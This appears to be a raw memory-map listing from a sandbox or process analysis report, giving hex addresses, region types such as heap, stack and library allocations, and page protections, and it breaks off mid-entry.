A1D0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
EC7E07E000
stack
page read and write
9450000
trusted library allocation
page read and write
D8F000
stack
page read and write
3007000
heap
page read and write
9330000
trusted library allocation
page read and write
95E4000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
83A5000
trusted library allocation
page read and write
3170000
heap
page read and write
8380000
unkown
page read and write
7541000
heap
page read and write
2AD71FD0000
trusted library allocation
page read and write
2795FE59000
heap
page read and write
48D0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
2228A67C000
heap
page read and write
2715488A000
heap
page read and write
1DAEB213000
heap
page read and write
BCBB000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
512E000
heap
page read and write
774F000
trusted library allocation
page read and write
9230000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
4CBD000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
5128000
heap
page read and write
8130000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
93AE000
stack
page read and write
56D8000
heap
page read and write
82AC000
trusted library allocation
page read and write
50E1000
heap
page read and write
AEF0000
trusted library allocation
page read and write
2BA5A413000
heap
page read and write
8390000
trusted library allocation
page read and write
7140000
trusted library allocation
page read and write
2AD6CA3F000
heap
page read and write
96A3000
trusted library allocation
page read and write
5340000
direct allocation
page execute and read and write
92A0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
773C000
stack
page read and write
2BA5A400000
heap
page read and write
7490000
direct allocation
page read and write
BF53000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
2228A645000
heap
page read and write
9158000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
3340000
heap
page read and write
7130000
trusted library allocation
page read and write
96D0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
2AD722D6000
heap
page read and write
271547A0000
heap
page read and write
9440000
trusted library allocation
page read and write
2E3F883D000
heap
page read and write
2228A642000
heap
page read and write
92C5000
trusted library allocation
page read and write
54E5000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
A0D0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4980000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
1060000
direct allocation
page read and write
9110000
trusted library allocation
page read and write
2E3F8851000
heap
page read and write
83E6000
trusted library allocation
page read and write
21D75724000
heap
page read and write
A0E0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
DC8000
heap
page read and write
C60000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
37A0000
direct allocation
page execute and read and write
9350000
trusted library allocation
page read and write
EFA000
heap
page read and write
9300000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
A330000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
2BA5A48C000
heap
page read and write
C40000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
C262000
trusted library allocation
page read and write
DD4000
heap
page read and write
9140000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
4AB0000
heap
page read and write
4C92000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4FA0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
2AD720E0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8160000
trusted library allocation
page read and write
7390000
trusted library allocation
page read and write
55E7000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
BF32000
trusted library allocation
page read and write
A0C8000
trusted library allocation
page read and write
9520000
unkown
page read and write
8170000
trusted library allocation
page read and write
4FC0000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
21DA903C000
heap
page read and write
7190000
trusted library allocation
page execute and read and write
9290000
trusted library allocation
page read and write
2AD6CA79000
heap
page read and write
1DAEB247000
heap
page read and write
96F0000
trusted library allocation
page read and write
911C000
unkown
page read and write
A0C0000
trusted library allocation
page read and write
9126000
trusted library allocation
page read and write
7541000
heap
page read and write
7380000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
21D76002000
trusted library allocation
page read and write
62937F000
stack
page read and write
A59E000
stack
page read and write
83C0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
4F7C000
heap
page read and write
AF20000
trusted library allocation
page read and write
A95D000
stack
page read and write
8395000
unkown
page read and write
83F0000
trusted library allocation
page read and write
A0D0000
trusted library allocation
page read and write
9128000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9265000
trusted library allocation
page read and write
1DAEB202000
heap
page read and write
84E27EE000
stack
page read and write
8130000
trusted library allocation
page read and write
9200000
trusted library allocation
page read and write
7175000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
B140000
trusted library allocation
page execute and read and write
B096000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9610000
trusted library allocation
page read and write
A110000
trusted library allocation
page execute and read and write
2228A685000
heap
page read and write
4CBB000
trusted library allocation
page read and write
31EE000
stack
page read and write
9102000
trusted library allocation
page read and write
8220000
trusted library allocation
page read and write
62927F000
stack
page read and write
34B000
stack
page read and write
83E0000
trusted library allocation
page execute and read and write
8397000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
50DC000
heap
page read and write
AF40000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
56E2000
heap
page read and write
7180000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
4AF3000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
E96D4FC000
stack
page read and write
83A0000
unkown
page read and write
4C78000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
A0F0000
trusted library allocation
page read and write
A110000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
2795FF02000
heap
page read and write
9407000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
9590000
unkown
page read and write
9330000
trusted library allocation
page read and write
854000
heap
page read and write
AF20000
trusted library allocation
page read and write
1E185425000
heap
page read and write
92A0000
trusted library allocation
page read and write
790000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
4E5E000
stack
page read and write
9310000
trusted library allocation
page read and write
DF547EB000
stack
page read and write
A0C41FB000
stack
page read and write
5250000
trusted library allocation
page read and write
3BD000
stack
page read and write
1040000
direct allocation
page execute and read and write
92C0000
trusted library allocation
page read and write
4DC3000
trusted library allocation
page execute and read and write
8E0000
remote allocation
page read and write
56A2000
heap
page read and write
7163000
trusted library allocation
page read and write
911E000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
49A0000
trusted library allocation
page read and write
9580000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
8245000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
AF40000
trusted library allocation
page read and write
7541000
heap
page read and write
A0E0000
trusted library allocation
page read and write
2AD6CAB5000
heap
page read and write
1DAEB248000
heap
page read and write
517000
unkown
page read and write
8180000
trusted library allocation
page execute and read and write
8110000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
850000
heap
page read and write
9690000
trusted library allocation
page read and write
55C4000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
4EE0000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
35F4000
heap
page read and write
9100000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
7541000
heap
page read and write
A1AE000
stack
page read and write
AEF0000
trusted library allocation
page read and write
839B000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
1E185413000
heap
page read and write
11A19FF000
stack
page read and write
9120000
trusted library allocation
page read and write
549F000
stack
page read and write
AF00000
trusted library allocation
page read and write
70E000
stack
page read and write
9350000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
5BA0000
direct allocation
page read and write
9300000
trusted library allocation
page read and write
9380000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
2AD72104000
trusted library allocation
page read and write
A1B4000
trusted library allocation
page read and write
11A1BFF000
stack
page read and write
A100000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
7541000
heap
page read and write
2AD6CB00000
heap
page read and write
2BA5A502000
heap
page read and write
A78000
heap
page read and write
94F0000
unkown
page read and write
2BA5A500000
heap
page read and write
2228A63E000
heap
page read and write
9100000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
4DF5000
trusted library allocation
page execute and read and write
95D0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
7A0000
direct allocation
page execute and read and write
21DA8EE0000
heap
page read and write
7541000
heap
page read and write
84E2D77000
stack
page read and write
9370000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
DD4000
heap
page read and write
AEF0000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
4C6B000
trusted library allocation
page read and write
4AA0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
9360000
unkown
page read and write
7541000
heap
page read and write
AF00000
trusted library allocation
page read and write
7C4000
heap
page read and write
7120000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
2228A651000
heap
page read and write
550E000
trusted library allocation
page read and write
7190000
trusted library allocation
page read and write
3680000
direct allocation
page read and write
563F000
stack
page read and write
9280000
trusted library allocation
page read and write
4FF2000
heap
page read and write
95F0000
trusted library allocation
page read and write
2BA5A508000
heap
page read and write
775C000
trusted library allocation
page read and write
7541000
heap
page read and write
9130000
trusted library allocation
page read and write
52E0000
direct allocation
page execute and read and write
9400000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
70B0000
heap
page read and write
B0E000
stack
page read and write
92C0000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
2AD722F2000
heap
page read and write
9300000
trusted library allocation
page read and write
96F5000
trusted library allocation
page read and write
21DA9099000
heap
page read and write
4FB5000
heap
page read and write
84E2AFC000
stack
page read and write
7170000
trusted library allocation
page read and write
62947F000
stack
page read and write
A140000
trusted library allocation
page read and write
7FD0000
trusted library allocation
page read and write
83A6000
trusted library allocation
page read and write
96F1000
trusted library allocation
page read and write
BF7B000
trusted library allocation
page read and write
2AD72124000
trusted library allocation
page read and write
2FDF000
heap
page read and write
21DA9013000
heap
page read and write
8214000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
9116000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9650000
trusted library allocation
page read and write
2AD6C940000
heap
page read and write
96F0000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
A0C43FB000
stack
page read and write
21D75530000
heap
page read and write
4AD0000
direct allocation
page execute and read and write
F6A000
heap
page read and write
2FB7000
heap
page read and write
9600000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
6FA1000
direct allocation
page read and write
AF30000
trusted library allocation
page read and write
1DAEB1D0000
remote allocation
page read and write
AF40000
trusted library allocation
page read and write
4B0000
heap
page read and write
84E26EB000
stack
page read and write
9480000
trusted library allocation
page read and write
C1A7000
trusted library allocation
page read and write
A170000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
5646000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
5693000
heap
page read and write
5BA2000
direct allocation
page read and write
9160000
trusted library allocation
page read and write
C1F3000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
854000
heap
page read and write
A140000
trusted library allocation
page read and write
A0D0000
trusted library section
page read and write
94DF000
trusted library allocation
page read and write
4D26000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
7260000
trusted library allocation
page read and write
2795FE13000
heap
page read and write
37C0000
heap
page read and write
9460000
trusted library allocation
page read and write
2AD6D500000
heap
page read and write
9509000
unkown
page read and write
92C0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
83B5000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
92C0000
unkown
page read and write
9105000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
568A000
heap
page read and write
2228A677000
heap
page read and write
92C5000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
A130000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
9570000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
54C7000
trusted library allocation
page read and write
4FD0000
heap
page execute and read and write
5706000
heap
page read and write
7541000
heap
page read and write
9115000
trusted library allocation
page read and write
2228A650000
heap
page read and write
7380000
trusted library allocation
page read and write
7541000
heap
page read and write
9120000
trusted library allocation
page read and write
A0F0000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
2AD72400000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
B70000
heap
page read and write
7060000
trusted library allocation
page read and write
4F50000
heap
page read and write
9290000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
83C0000
unkown
page read and write
3038000
heap
page read and write
9300000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
83C5000
trusted library allocation
page read and write
A40000
heap
page read and write
96E0000
trusted library allocation
page read and write
854000
heap
page read and write
92C0000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
70B0000
trusted library allocation
page read and write
C50000
trusted library allocation
page read and write
7090000
trusted library allocation
page read and write
1DAEB23D000
heap
page read and write
2E3F8813000
heap
page read and write
7740000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9105000
trusted library allocation
page read and write
83E5000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
A0C3CFB000
stack
page read and write
83A0000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
6FD0000
direct allocation
page read and write
9300000
trusted library allocation
page read and write
9140000
trusted library allocation
page read and write
1DAECBA0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
AF90000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
350000
trusted library allocation
page read and write
7266000
trusted library allocation
page read and write
55B000
stack
page read and write
AD10000
trusted library allocation
page read and write
8110000
trusted library allocation
page read and write
9636000
unkown
page read and write
83E0000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
E1B30FE000
stack
page read and write
DD4000
heap
page read and write
9300000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
5430000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
5691000
heap
page read and write
940000
remote allocation
page read and write
96F0000
trusted library allocation
page read and write
56FE000
heap
page read and write
CFD000
stack
page read and write
95B0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
50D1000
heap
page read and write
E92000
unkown
page read and write
21DA9108000
heap
page read and write
9350000
trusted library allocation
page read and write
9630000
trusted library allocation
page read and write
545E000
stack
page read and write
2AD72300000
heap
page read and write
9130000
unkown
page read and write
A0E8000
trusted library allocation
page read and write
96F9000
trusted library allocation
page read and write
8E0000
remote allocation
page read and write
9740000
trusted library allocation
page read and write
A110000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
83E0000
unkown
page read and write
21DA9079000
heap
page read and write
83C0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
2AD722AD000
heap
page read and write
83E0000
trusted library allocation
page read and write
7541000
heap
page read and write
EC7DBAE000
stack
page read and write
9260000
trusted library allocation
page read and write
94BD000
trusted library allocation
page read and write
2BA5A402000
heap
page read and write
C6F000
stack
page read and write
96A0000
trusted library allocation
page read and write
567C000
stack
page read and write
5698000
heap
page read and write
6F90000
direct allocation
page read and write
92C0000
trusted library allocation
page read and write
2AD721C0000
trusted library allocation
page read and write
4790000
direct allocation
page execute and read and write
A2F0000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
D3E000
stack
page read and write
48F1000
heap
page read and write
AF07000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
1DAEB22A000
heap
page read and write
9170000
trusted library allocation
page read and write
9250000
trusted library allocation
page read and write
9500000
unkown
page read and write
9350000
trusted library allocation
page read and write
92D0000
trusted library allocation
page execute and read and write
83E5000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
7541000
heap
page read and write
54C8000
trusted library allocation
page read and write
550E000
trusted library allocation
page read and write
55B0000
heap
page read and write
A0F0000
trusted library allocation
page read and write
2F30000
trusted library allocation
page read and write
AF60000
trusted library allocation
page read and write
7541000
heap
page read and write
9320000
trusted library allocation
page read and write
5112000
heap
page read and write
9460000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
52D000
stack
page read and write
96F0000
trusted library allocation
page read and write
7541000
heap
page read and write
9110000
trusted library allocation
page read and write
93E0000
unkown
page read and write
9100000
trusted library allocation
page read and write
7210000
trusted library allocation
page read and write
5C60000
direct allocation
page read and write
AF00000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
DD4000
heap
page read and write
8395000
unkown
page read and write
9350000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
5C00000
direct allocation
page read and write
7130000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
7F0000
remote allocation
page read and write
4EE0000
trusted library allocation
page read and write
50A8000
heap
page read and write
E1B33F7000
stack
page read and write
9110000
trusted library allocation
page read and write
2AD72306000
heap
page read and write
56F5000
heap
page read and write
56BC000
heap
page read and write
5898000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
8390000
unkown
page read and write
9EE000
stack
page read and write
9300000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
21D75664000
heap
page read and write
A140000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
56C6000
heap
page read and write
9280000
unkown
page read and write
B040000
trusted library allocation
page read and write
E1B35FF000
stack
page read and write
8380000
trusted library allocation
page read and write
DE0000
direct allocation
page read and write
C24F000
trusted library allocation
page read and write
83E0000
unkown
page read and write
2AD722E1000
heap
page read and write
9450000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
2228A671000
heap
page read and write
A130000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
1280000
direct allocation
page execute and read and write
21DA907A000
heap
page read and write
96A0000
trusted library allocation
page read and write
A1B0000
trusted library allocation
page read and write
501A000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
94F0000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
2AD7224F000
heap
page read and write
A78000
heap
page read and write
EC7DF7E000
stack
page read and write
9400000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
4EC0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
7541000
heap
page read and write
A1D0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
980000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
BC0000
trusted library allocation
page read and write
B080000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
70A0000
trusted library allocation
page read and write
83E0000
unkown
page read and write
96F0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
907000
heap
page read and write
4ACF000
heap
page read and write
9340000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
E96D6FD000
stack
page read and write
9330000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
35EE000
stack
page read and write
95D0000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
AF30000
trusted library allocation
page read and write
83E0000
unkown
page read and write
512E000
heap
page read and write
990000
heap
page read and write
7140000
trusted library allocation
page read and write
9125000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
1050000
heap
page read and write
BF8B000
trusted library allocation
page read and write
AF20000
trusted library allocation
page execute and read and write
9117000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
11A1DFB000
stack
page read and write
AFD0000
trusted library allocation
page read and write
2228A680000
heap
page read and write
9630000
unkown
page read and write
2228A641000
heap
page read and write
8150000
trusted library allocation
page read and write
21DA8EF0000
heap
page read and write
9107000
trusted library allocation
page read and write
2AD721B0000
trusted library allocation
page read and write
9280000
trusted library allocation
page read and write
512000
unkown
page read and write
21DA9086000
heap
page read and write
5706000
heap
page read and write
92C5000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
7541000
heap
page read and write
5CA0000
heap
page read and write
BA73A7E000
stack
page read and write
9260000
trusted library allocation
page read and write
96A0000
unkown
page read and write
2228A629000
heap
page read and write
7160000
trusted library allocation
page read and write
1B4F5002000
heap
page read and write
93B0000
trusted library allocation
page read and write
50A0000
heap
page read and write
2795FE58000
heap
page read and write
9100000
trusted library allocation
page read and write
74A0000
trusted library allocation
page read and write
50CC000
heap
page read and write
496E000
stack
page read and write
BAE1000
trusted library allocation
page read and write
C1AF000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
D1E2DFA000
stack
page read and write
2228A669000
heap
page read and write
5706000
heap
page read and write
21D7567A000
heap
page read and write
4DDD000
trusted library allocation
page execute and read and write
567A000
heap
page read and write
21DA9113000
heap
page read and write
579F000
stack
page read and write
9330000
trusted library allocation
page read and write
89E000
stack
page read and write
5FF6000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
83C5000
trusted library allocation
page read and write
58E2000
trusted library allocation
page read and write
55A5000
trusted library allocation
page read and write
7050000
direct allocation
page read and write
9130000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
550000
remote allocation
page read and write
48F0000
heap
page read and write
21D75590000
heap
page read and write
9690000
trusted library allocation
page read and write
FB8B97C000
stack
page read and write
83E0000
trusted library allocation
page read and write
92C6000
trusted library allocation
page read and write
6F96000
direct allocation
page read and write
9630000
unkown
page read and write
9100000
trusted library allocation
page read and write
94C0000
trusted library allocation
page read and write
83E0000
unkown
page read and write
AEF0000
trusted library allocation
page read and write
9138000
trusted library allocation
page read and write
2228A653000
heap
page read and write
A0E0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
5D0000
heap
page read and write
401000
unkown
page execute read
7140000
trusted library allocation
page read and write
84E276E000
stack
page read and write
5549000
trusted library allocation
page read and write
E1B31FB000
stack
page read and write
7770000
trusted library allocation
page read and write
2BA5A450000
heap
page read and write
96E0000
trusted library allocation
page read and write
83A0000
unkown
page read and write
9105000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
7541000
heap
page read and write
B010000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
92A0000
unkown
page read and write
B020000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
54E6000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
35F4000
heap
page read and write
83A0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
1DAECC02000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
2AD6DAE0000
trusted library allocation
page read and write
4C0000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
7541000
heap
page read and write
7180000
trusted library allocation
page read and write
95C2000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
35F4000
heap
page read and write
7180000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
2AD6CA73000
heap
page read and write
9560000
trusted library allocation
page read and write
FB8ADCC000
stack
page read and write
2AD6D504000
heap
page read and write
2228A613000
heap
page read and write
8390000
trusted library allocation
page read and write
84E2F7F000
stack
page read and write
A91E000
stack
page read and write
83A5000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
83C0000
trusted library allocation
page execute and read and write
7160000
trusted library allocation
page read and write
6AF1000
direct allocation
page read and write
340000
heap
page read and write
400000
unkown
page readonly
9470000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9127000
trusted library allocation
page read and write
AF30000
trusted library allocation
page execute and read and write
5714000
heap
page read and write
51F8000
heap
page read and write
93B0000
trusted library allocation
page read and write
E96D9FE000
stack
page read and write
716D000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
569B000
trusted library allocation
page read and write
A75E000
stack
page read and write
AEF0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page execute and read and write
9330000
trusted library allocation
page read and write
1DAEB258000
heap
page read and write
9106000
trusted library allocation
page read and write
32EE000
stack
page read and write
2FF0000
heap
page read and write
9280000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
B0A0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
9116000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
8120000
trusted library allocation
page read and write
BD01000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
59A8000
trusted library allocation
page read and write
9368000
trusted library allocation
page read and write
92CA000
trusted library allocation
page read and write
4B50000
heap
page read and write
474E000
stack
page read and write
5220000
trusted library allocation
page read and write
30A0000
heap
page read and write
9110000
unkown
page read and write
92C0000
trusted library allocation
page read and write
8250000
trusted library allocation
page read and write
1E185429000
heap
page read and write
74F000
stack
page read and write
2FC5000
heap
page read and write
2BA5A44A000
heap
page read and write
91E0000
trusted library allocation
page read and write
1B4F5075000
heap
page read and write
2AD721B0000
trusted library allocation
page read and write
3178000
heap
page read and write
C40000
trusted library allocation
page read and write
35F4000
heap
page read and write
8180000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
2AD6D415000
heap
page read and write
92C0000
trusted library allocation
page read and write
1DAEB248000
heap
page read and write
91D0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
4F83000
heap
page read and write
E96CFAB000
stack
page read and write
96D0000
trusted library allocation
page execute and read and write
271548BF000
heap
page read and write
2228A652000
heap
page read and write
92C0000
unkown
page read and write
92C0000
trusted library allocation
page read and write
A1B0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
9407000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
2795FD80000
heap
page read and write
9330000
trusted library allocation
page read and write
9360000
unkown
page read and write
9160000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
50CD000
heap
page read and write
59BB000
trusted library allocation
page read and write
50CA000
heap
page read and write
AF00000
trusted library allocation
page read and write
AEF5000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
9690000
